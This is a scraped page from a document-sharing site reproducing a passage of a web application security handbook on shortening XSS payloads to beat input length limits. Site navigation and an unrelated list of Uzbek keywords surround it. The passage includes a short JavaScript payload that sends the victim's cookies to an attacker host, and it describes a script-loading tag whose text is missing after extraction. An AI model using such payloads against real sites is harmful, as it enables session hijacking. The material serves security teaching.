The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


is malformed but is nevertheless tolerated by the client browser. Because



Download 5,76 Mb.
Pdf ko'rish
bet702/875
Sana01.01.2022
Hajmi5,76 Mb.
#293004
1   ...   698   699   700   701   702   703   704   705   ...   875
Bog'liq
3794 1008 4334

is malformed but is nevertheless tolerated by the client browser. Because

numerous quite legitimate web sites contain HTML that does not strictly comply

to the standards, browsers accept HTML that is deviant in all kinds of ways, and

effectively fix up the errors behind the scenes, before the page is rendered.

Often, when you are trying to fine-tune an attack in an unusual situation, it can

be helpful to view the virtual HTML that the browser constructs out of the

server’s actual response. In Firefox, you can use the WebDeveloper tool, which

contains a View Generated Source function that performs precisely this task.

Beating Length Limits

When the application truncates your input to a fixed maximum length, there

are three possible approaches to creating a working exploit.

The first, rather obvious, method is to attempt to shorten your attack pay-

load by using JavaScript APIs with the shortest possible length and removing

characters which are usually included but strictly unnecessary. For example, if

you are injecting into an existing script, the following 28-byte command will

transmit the user’s cookies to the server with hostname 

a

:

open(“//a/“+document.cookie)



Alternatively, if you are injecting straight into HTML, the following 30-byte

tag will load and execute a script from the server with hostname 

a

:



On the Internet, these examples would obviously need to be expanded to

contain a valid domain name or IP address. However on an internal corporate

network, it may actually be possible to use a machine with the WINS name 

a

to host the recipient server.



T I P


Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   698   699   700   701   702   703   704   705   ...   875



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling
kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha

yuklab olish